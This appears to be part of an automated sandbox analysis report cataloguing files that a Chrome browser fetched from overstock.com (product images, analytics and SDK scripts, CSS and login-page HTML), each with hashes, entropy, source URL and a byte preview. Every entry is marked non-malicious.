                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1370
                                                                                                                                                                                    Entropy (8bit):6.547671476178698
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:kTCIl/X2YlXWI2PUini5jwMoRWn2fxenuhkpbDu+vkUnXzuWZxGJt:hIl/XflMng4cAiu8/WWDm
                                                                                                                                                                                    MD5:DAC146AAEE80753A36DF238759171923
                                                                                                                                                                                    SHA1:725A979BF33A8D911ED45A9134DE19FE87147575
                                                                                                                                                                                    SHA-256:701E29F23E84A120E1828E3E71D327039236E932F059470D8D6C41EC5DC7063F
                                                                                                                                                                                    SHA-512:938E360C4999DDB6C3A0C2F1152D13F84F3838505FAE7C3DAB62A16D306E9F46892E1070B72F929CE34B4E05DE434A4E146C286094C21B064E3D6C1C47EC7401
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_39d35963-51ba-49d0-96c9-46af4de05f96.jpg?v=1729325110&width=80
                                                                                                                                                                                    Preview:RIFFR...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>-..B........bY.2Q(.!.K.arX......T.....i.(Hr...V.....Z..0.l4.!.R......Y}.Y.:O....F.nX."!*. ....P..i....w...6u.1h..=..3{W......@.....>...NG.+`.%..kp.._........J..H.E..W...m5.".4.~.m2.I.Ww.s$..In...}.O...7..cv......o.F{.~.VH`\.jC.......i..D?+..&...YF /..mw..+%...?.~...W...?'].B.....|..s?.....-...-...........=..q...: ....(..~..g..y.....t.\..A...;.v~*iN.....?.T.TV..C..jzc..(jJ$....J...*R1|.U..U..q.Q.....\6.P...|....do;.Y.D....q.$...I5.BM~^5u..9.y-.g...?3j....XNJ..NKG.5.z.$&..8...j...'-...v..y).E..o..z
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1489)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):171592
                                                                                                                                                                                    Entropy (8bit):5.443684177166343
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:S2Fapj+KbTz+tOPv/aPIvqYsfIISRqOSgwOpP3kpQx8zZ0sGYdZl:Soat+KbTz+tOyPIvqYsfIRqOSgwOpP32
                                                                                                                                                                                    MD5:A02CF4647005E5EB3AA81DDEC918C5DD
                                                                                                                                                                                    SHA1:628A3F44BCF2CE9A4A0433FCA5C1147FF6F9A851
                                                                                                                                                                                    SHA-256:35EBD0475BAB82CD3E9B2ED9F7C0C63AFE4F9962FEBA74EFB6A19BDB54C01D9D
                                                                                                                                                                                    SHA-512:2E25B4CE64860BD676F5F119862D149978B1B2915911DFFCD54627AEAF3863DC6F0C1FFB53BA8F2C8961E989D395D55B7E001DE40D4310D062C9AFB9801D56D0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*.* Braze Web SDK v5.1.1.* (c) Braze, Inc. 2024 - http://braze.com.* License available at https://github.com/braze-inc/braze-web-sdk/blob/master/LICENSE.* Compiled on 2024-02-13.*/.(function(){(function(b,a){if("object"===typeof module&&module.exports) {var e = a();module.exports=e;module.exports.default=e;}else if(b.braze){var d=a(),c;for(c in d)b.braze[c]=d[c]}else b.braze=a()})("undefined"!==typeof self?self:this,function(){var brazeInterface={};var n;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}function r(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if("number"==typeof a.length)return{next:aa(a)};throw Error(String(a)+" is not an iterable or ArrayLike");}function ca(a){if(!(a instanceof Array)){a=r(a);for(var b,c=[];!(b=a.next()).done;)c.push(b.value);a=c}return a}.var da="function"==typeof Object.create?Object.create:function(a){function b(){}b.prototype=a;return new b},fa="function"
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1048576
                                                                                                                                                                                    Entropy (8bit):7.93108878037273
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:+z31mZL3R9cCzugpGHNs8k2YeP6Ygx/w6iDAYtoE3ZI:+JmNR9vKgpi6r2Vgx/1QxI
                                                                                                                                                                                    MD5:81CF680F82D58BCD6FF5559F53DE92B7
                                                                                                                                                                                    SHA1:CAAF81632329C73976CBE10B59A3FEC06AEC9011
                                                                                                                                                                                    SHA-256:FA16EB6578344110D547E1A56634A2B969BA0A1CAA9D7EBBBBF530E5029047D9
                                                                                                                                                                                    SHA-512:631D4354BAFBA7D2991FC961C63558D8563206C22644F92714CDC84F0BA6E47C18E7C03F33A40027674379E6DA999C67F9F57F1524D434817ADD144D6AD1A7BA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/video/homepage/10162024-MOPS-V3850x447_DesktopA1_2024_BBB_HomefortheHolidays_BKG_V2.mp4:2f8447e3ce2bbd:2
                                                                                                                                                                                    Preview:..y...Y[.y*h0p.si..-(A.].s.u.H$8.N9W..7...*_ m.5............hh...`{......z...<.C..V....A..J[....W.(.|.V.....-.p...x.........ed.....@2WB..b.._..O....O.8.........N(.....s\..vH(@.l.......zg.2....u.....N.d.......?h[.X.{.Z..e....S|."....=ES5.V..EY._.eeX......."P..o.!Aq......l.{.+Q..t.T.I.|:X..E.H..([I'm5.f..4....H{....X..N.bm..TD......;.g..1...r...d;.=.).hq...n..".i...D.*...9..28.&^.Vrs......M.>uC.M..H.].......D.m....E-Bz..K.z..]-.c.A...*..k..........i.V.0.f?..n.5..&...>8.D..=.>.6.FD...z.tM.Y.Q:...o........t;o..s.|?.D.H.5j@.X...@^.\..S.Z.ls..;U...t..`..6.!.z..u..f).,..S....o.._.o.X.F.:...fS.....x..8...B.&......;...n..7.0l.......{RHx.m<O..*..s..Uj.S........8.{...zT.G..._.vq...yx..........|_.....@...3x.x..V.y.f.&.....gtYyZ...|1.P...-X.{......R.+..Z..Z.+...;A...l...zG,.%.5.....d.....#".......Q.:..h....kf..j%..H..W.>.1a......z.~..3..B...k.....j.m.....j?..N.v.Z.......b.gu#b(...{/..$.a.B..,...HG.Z'...ao.E.F.....q.....M..9.._*..;. .v...`]...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):149805
                                                                                                                                                                                    Entropy (8bit):5.6004134683803555
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:Cnxj4bndhXdOU0tNo455wjdrm/bK+OTRMWMrvBDJTcitj+wf2EAeiPWMWNZVgdyo:Cnxj479OU03o4PwjhIBVT39ROyuvb
                                                                                                                                                                                    MD5:5693E74A87CDFE0DD8CF9E97ABC2EC67
                                                                                                                                                                                    SHA1:0912A92CEBFC4248B4D561F57B32D18135F9AD59
                                                                                                                                                                                    SHA-256:79951B5BD4D729A2B2F4D380819F2C14BBCF26F21DB56A520189633467766CF4
                                                                                                                                                                                    SHA-512:B0954FF6229C037AAEC67F6CC91889D3AD1C0D38AC3E53E61F3A98D49379FA43C1FF709C7017459B9BD416BCEB2236D90B24C17E072882C122360069DCD9E0E0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://analytics.tiktok.com/i18n/pixel/static/identify_7bf75739.js
                                                                                                                                                                                    Preview:!function(){"use strict";function t(){t=function(){return e};var e={},d=Object.prototype,n=d.hasOwnProperty,r="function"==typeof Symbol?Symbol:{},o=r.iterator||"@@iterator",i=r.asyncIterator||"@@asyncIterator",a=r.toStringTag||"@@toStringTag";function $(t,e,d){return Object.defineProperty(t,e,{value:d,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{$({},"")}catch(t){$=function(t,e,d){return t[e]=d}}function u(t,e,d,n){var r=e&&e.prototype instanceof s?e:s,o=Object.create(r.prototype),i=new w(n||[]);return o._invoke=function(t,e,d){var n="suspendedStart";return function(r,o){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===r)throw o;return E()}for(d.method=r,d.arg=o;;){var i=d.delegate;if(i){var a=_(i,d);if(a){if(a===c)continue;return a}}if("next"===d.method)d.sent=d._sent=d.arg;else if("throw"===d.method){if("suspendedStart"===n)throw n="completed",d.arg;d.dispatchException(d.arg)}else"return"===d.method&&d.abrupt("return",d.arg);
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1849
                                                                                                                                                                                    Entropy (8bit):6.609800665514026
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZYC6zArrm25IJcISBKwuJS84EinIXB08kK8D8KnoWS/pf:NBIl/XflVx11L5IJcInwuJbS9K84KZLM
                                                                                                                                                                                    MD5:64D83148E0F1CE58E1649983CC0490D4
                                                                                                                                                                                    SHA1:C4A068B4C6F5E5B8EB0F25180D7D431085574532
                                                                                                                                                                                    SHA-256:A2C64011BB0C07C004C8B37373311CB12AFB7837A15C351B9229014FEBF35D41
                                                                                                                                                                                    SHA-512:E36AFB831809A3C6297701783157C0619BDEDC5531C66CC5A50FC8E8F2790514CFA4170590D378A252F4124CF957A924289E27006DEF439DADF2FD6047BF06AB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P.................................................................................,...........H.cXL....,.3..|....m....V.it...s\..s.D..D9go9.Q.w..*k..C... .V..n}g|...P...........;........................!.1A..Q.."a...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):35290
                                                                                                                                                                                    Entropy (8bit):7.981708400879586
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:uCCGqghZaxwAKNIufoO54IEMjKpdONjgiDGTXYO6itUWKOw2tkE6Nr:u4lhZaOQe4I0GjDCYO6itzaNr
                                                                                                                                                                                    MD5:1A8519454E2B06704C8228992D8267E8
                                                                                                                                                                                    SHA1:645896BC860FFB5EF2A91941F92D655976A70D25
                                                                                                                                                                                    SHA-256:A929DCA35C07410AAB5B5945406B51163B03E0EAB1CA2DBABA41360082349138
                                                                                                                                                                                    SHA-512:3464D99D807EBB05AA8C11161B34DC5745ADBC1140CA211A8F8020B4580C3C655473E79285A5547AF679C3EB82F5BB98CB6F5D2977336FB4A873A2D715E1AC28
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/10282024-MOPS-A2_Desktop.jpg?v=1730145898&width=650
                                                                                                                                                                                    Preview:RIFF...WEBPVP8X....(......m..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 B.......*..n.>9..C.!.... .....W\.....(......../.?........?.O*....~{...g.....{+....X.....'.......~......K..../......N...w.........W............X.I...W...........?....e...../.../.....~._.?....0..........w.?.o......}..(...............?........q....._........O...~Ly.....~.~....T..a.Sz........~..c.....'......c.....G.....~X.....=.O.~....../..f._.3........m........2.....@.....7......Q......./`_..........`........t.........G.'.g....?................v........3.O...S...a..l6....a..l6....a..l6....a..l6....a..l6....a..,.M...7x...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 250x250, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):5234
                                                                                                                                                                                    Entropy (8bit):7.416127410020504
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:NhIl/XrxMnR7O/mV1xtPmfawz0fmfH9XObJj5er8pFfKc1ZB6yTz:NWaOOVXtPMEMHwVFgKnB60z
                                                                                                                                                                                    MD5:8208FCBFB6894CAA1DF8C1A949AE7CD5
                                                                                                                                                                                    SHA1:3500164BC1D9F085C25998C4E8368D9EAA5D3693
                                                                                                                                                                                    SHA-256:26D313767FA2DE72C01F46F74FFD10F3CD9ABF1AFBEAC78FBA4CA0D347EAF0B3
                                                                                                                                                                                    SHA-512:79981E1B88C2A6C086AF01CE2767D4098FEDA8604A279852E2B782AEE86A334115AF7783C7AF1D0A85628E0416A525FF5A4C5A3DFFEAC1F639D4187F87BDE5F3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100............................................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}..........................................................................................,.....................................................................................................................................c...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1228
                                                                                                                                                                                    Entropy (8bit):6.29846962499054
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:0STCIl/X2YlXWI2PUycbQ+YFzdg5udc2vd6D2O3jqI:wIl/XflTUPzdg2F6DSI
                                                                                                                                                                                    MD5:7B35ADC82B83223703BCD45AD13E01EB
                                                                                                                                                                                    SHA1:451AA21C49FA0E81A9331BEF718EF9F0E7095429
                                                                                                                                                                                    SHA-256:863607E497BFFF2F6F5D0B21552401A5DE881BE2F3653A013928B42D19DD9BF3
                                                                                                                                                                                    SHA-512:8E4DF95556F6B6C63447BD3E19A02946C2438A4A2D5897382AB3D1DDEF02CC0A3E2D49C505421049BB9877A84CEF693522E63BE146125F7BBA8D77CC590F5F3B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_38c78e67-21d2-4c7c-9855-fdcb05375af9.jpg?v=1729325178&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 4...P....*P.P.>1..B.!!..%. ....h.V..<d.......O...X.Y.pI6.I....:.a..d2........ki`..=0TG.y.v........6.T..!.h.'Dz[..s..1..<..`..+0..)8r..nRP<.h....p...}..0m...s....Z.;=Y$=....[-a..1..#..Dy..E.-`.2..O......9..n,H.Z...87f[...u.q....Aq !.,......f..Y.. .p.............A.\..K........t|Z<...:H......$..X&qCeM....1.a.q...d...~/%......~...M..TN.dA`...!;.'T...j5.C...$>^..qjx..q.....@.@....Zk6.l...O@....q'R......x.wT.....'/......Y...2.TA@..F..{t..S-E....TZ....._....."oL.I^.....*l.........N..V..B...g....<...L.l'
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1613)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1709
                                                                                                                                                                                    Entropy (8bit):5.097541042755715
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:GqwNClgCRURNRcKiRKPx0oEjgRXRSODxNlS8:GBCqDPiexdEcNcO9LS8
                                                                                                                                                                                    MD5:8118FAF15E789BD28C5A024C46FEB99E
                                                                                                                                                                                    SHA1:8E639D2F560673E3BAABEFD7C421B5F139FE366B
                                                                                                                                                                                    SHA-256:0229324858585B125465D981F1D9F58CA37867CB0C8B71BE92729181BCCC86BD
                                                                                                                                                                                    SHA-512:815B6F5EDD6D54F6AE6360B52AA4BE2263A5E16FC56579BE3B28DC8D05999652EE7133023A8827D491D9598BF77E425302C48D9AA0F7E76B1389DA4EC93DF7EB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/gallery.css?v=44986831446514692791730157903
                                                                                                                                                                                    Preview:.gallery-block--stacked:last-child .gallery-block__text{margin-bottom:0}.gallery-block .subheading:not(:last-child){margin-bottom:var(--space-unit)}.gallery{grid-auto-rows:-webkit-min-content;grid-auto-rows:min-content}.gallery.grid{gap:calc(3 * var(--space-unit))}.gallery .color-scheme--white{background:none}.gallery .color-scheme--default{background-color:rgba(var(--bg-color))}.gallery-block__image{flex-grow:1;padding:5%}.gallery-block__image-text,.gallery-block__promo-text{z-index:2;padding:5%}.gallery-block__image-text p:last-child,.gallery-block__promo-text p:last-child{margin-bottom:0}.gallery-block__image-text.text-overlay{max-width:400px;margin:0}.gallery-block__promo-text{display:flex;flex-direction:column;justify-content:center;border-radius:var(--overlay-border-radius, 0)}.gallery-block__promo-text--opaque{box-shadow:2px 2px 8px #212b363d}.gallery-block__image-text--transparent{padding:0}.gallery-block__promo-text--rounded{border-radius:50%;aspect-ratio:1/1}.gallery-block__t
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3160
                                                                                                                                                                                    Entropy (8bit):7.523317415391143
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:0Il/Xfl4S6jDKyk3CUEcbiOJvlpD8g+a7/pbZLVUiA+vci42Xe:0Il/XgDKy6ESvUV0Bb1+iQ
                                                                                                                                                                                    MD5:4E8D7FBB9D39EF61DD8819E07737A017
                                                                                                                                                                                    SHA1:1A4B56054957ECFAF84799451B2722BC7C740846
                                                                                                                                                                                    SHA-256:1C6F74B14917AE35E6FE94430550CCE9FF71CD9411E15B7F12CC341C82BB20A2
                                                                                                                                                                                    SHA-512:636B1807A9EAB90311DCA9FBDC69F5257495CA792AFC2E60AEB83001BCEBF5775F5E84CBE5864E442758E360BFF2E2ACAB9352292D5FEC1E3060B2116ABB6405
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_018c939b-1f1d-4c86-9a98-ff49aa188061.jpg?v=1729322907&width=80
                                                                                                                                                                                    Preview:RIFFP...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....p%...*P.P.>1..C.!..... ....N.q..C.^..!.2.j.p=Hy..,.!.3...{.g...W......L..|..w......=......~&d.........._..-......T|xt..Y........>..........n.^...b.T....6E.uW..;.._iw(A.V To.......01XAT&...].....o.|.JU...sc..?.....o<.c.x...5A.....!s.?./J.I....<....Pu...Abj..........;8@.]..A..4....%.y.&Q.+..........k...O.M..%..Lh....'[z?....0E{.!..L..4wY....m..-.<.?<.P.b.Xt..........B........+..M.d...?......|U...HUIo..3......U...9...FIN.q....nw....2...(.g......IV.8H...H...NQ...V.6L]...&..>.ktOJ{.............,a.+d.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):32698
                                                                                                                                                                                    Entropy (8bit):7.983294195111161
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:Z3CzLU2r+L/QnkBRnmWKbL4frK9MeLLjY:ZSlSI0RmNf4u9D4
                                                                                                                                                                                    MD5:105865C044DA1F57B365E0516F08F8A4
                                                                                                                                                                                    SHA1:0BDD29C3EA2C9E7693120005AFF46E6EF7E4248B
                                                                                                                                                                                    SHA-256:C71D4BB4B3532378F9824F8C736EE8EE0DDD3915A0FE8D12D791787F23E33CB9
                                                                                                                                                                                    SHA-512:398A173F7995F7F0B7B2844C958F634AA999D9A2D3C645AD7825948F13B6855A10A6FCD8594BB673BD671C4F5895FDB218A02CD2263F9BA424F8FE5F95B60372
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/collections/Brown-Seagrass-Bohemian-Vase.jpg?v=1710949289&width=320
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 "}..PO...*@.@.>9..C"!!.{.` .....KL....3.......}#LO..+._.<.=.._?...V.l.q...{.o..............;.O.o......u.......3.....'.O.......?..........W.'........._.~G.m...........{......0./.7...B.7.....?........S.?....9./........m.g...^I.R...o..G...?..m......._.......Q............?..v.1.....o....;....?.?(.....X.s..............}.g./.o.?.........i...g.o.?.^...._.O.W...................~..t..{.~...s....,=...k.E.7..t3;.F. *?.k....h.......E.q...!.F) ./.p..k.R>.y.y...S.'u.;.....J...U...1..7k.S;j.3.../7.D...w...E.;.`...D.]q.!.......
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                    Entropy (8bit):4.301508290129998
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:m8ZJ570T4X7:m+5X7
                                                                                                                                                                                    MD5:AD8B6F08655797587CDEC719A94EFE59
                                                                                                                                                                                    SHA1:182ADF5A140796F81E930649D05654DBF22FD5B7
                                                                                                                                                                                    SHA-256:77D5FE96DEFD6C8C1E3B0466B4827CF83DC7E5C727A10177E115D25132FA86F6
                                                                                                                                                                                    SHA-512:519A8EA7CE2ED8661CC72D58BC0C02E721EF8E64608F4D2E26A56A970D43EBBF21BDF579C543EE1DFD667DA8F87467C60111A3E6D246D435A5C2D066AB88EFA3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:window['google_noFurtherRedirects'] = true;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):18
                                                                                                                                                                                    Entropy (8bit):3.4193819456463714
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YAsf4:YAsQ
                                                                                                                                                                                    MD5:C07FE8D0C031632D49B937F7B64CC318
                                                                                                                                                                                    SHA1:B50FF5D4241ED1D437505098707C289683F62ACF
                                                                                                                                                                                    SHA-256:9B5179EA2A77FE69B294FBD2ED504EACBFBE048EDE58967B43AF2CA537144B1F
                                                                                                                                                                                    SHA-512:394C5DA339B99343711A35BCF088CB6EA5E93462616B6E5A2085182F55B63206ADA99E4A429B332170F958F2ACBEB57B9623AF1B96CEA288E34BCDE693541723
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://shop.app/pay/session?v=1&token=63df21c7-147c-4b2e-8293-7c6e9854464a&shop_id=87436591420
                                                                                                                                                                                    Preview:{"eligible":false}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (58819)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2552147
                                                                                                                                                                                    Entropy (8bit):5.279501199728772
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:Gr7+XNoE0ehD2vByjVEJYJGrZ9RlyMkI2c+OC5yXJSMg4uz8ScBoRqw+YGK2L3KY:Gn+WsUBYLFr1+Vz
                                                                                                                                                                                    MD5:218D520094C706B877F53C40963B35A7
                                                                                                                                                                                    SHA1:992E9EA20D69DCA27A465E7998B1F21E17A3A587
                                                                                                                                                                                    SHA-256:819CF1776E71551CF75F79AD8651415AE5270C2E0CA91C6D3832DA5DC91466ED
                                                                                                                                                                                    SHA-512:AEF3680977B8D9FBF9B10305C0CBFF26EB7D7C820B880BD0720255C4C811F2C31F2BBC693968B8B9301E333ABCB3AFF25312F0EF715A00B2C4C9EB3FE291A6EE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/account/login
                                                                                                                                                                                    Preview:<!doctype html>.<html class="no-js" lang="en" dir="ltr">.<head>. <script>. if (!window.DOMAINE) window.DOMAINE = {};. window.DOMAINE.technical = {. apiVersion: "2024-07",. storefrontToken: "72e5b536982e2714efe8f8314d50d8f3",. shopName: "a37a28-2.myshopify.com",. localization: {. countryCode: "US",. currencyCode: "USD". }. };.</script>.. <script>. const _url = new URL("https://www.overstock.com/account/login").. if (_url.host === 'a37a28-2.myshopify.com' || _url.host === 'checkout.overstock.com') {. _url.host = 'www.overstock.com';. window.location = _url.toString();. }.. if (_url.pathname === '/account/login') {. const loginURL = new URL('?redirect_to=https%3A%2F%2Fwww.overstock.com%2F', 'https://login.overstock.com');. window.location = loginURL.toString();. }. . const query = new URLSearchParams(window.location.search).get('q')?.toLowerCase();. const path = window.location.pathname;.. if (path === '/search'
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4779), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4779
                                                                                                                                                                                    Entropy (8bit):5.432966155708213
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:9WsFpRR6JYMuuwCp0yXALwpdh02MGkm8NhRe61pecbt:9+d2CpRpjfMiMRHwcbt
                                                                                                                                                                                    MD5:7487394C252ED25468A2037369D345E5
                                                                                                                                                                                    SHA1:77E52C98B573C8DAD4542BA35D98A213B004D8AD
                                                                                                                                                                                    SHA-256:919293E56B6A814A84A579B014F63A2423B0419C418494DA7BAA7C0C5893CDE1
                                                                                                                                                                                    SHA-512:D60AA3C9FB3E33573819398EF86C8813AABE2B2932C65637D9BBF53860B760EA917E2FDA41C1B2EEF0D89EB9AC4495FD76E521B4B472D6C126770EAFBAED1BAD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
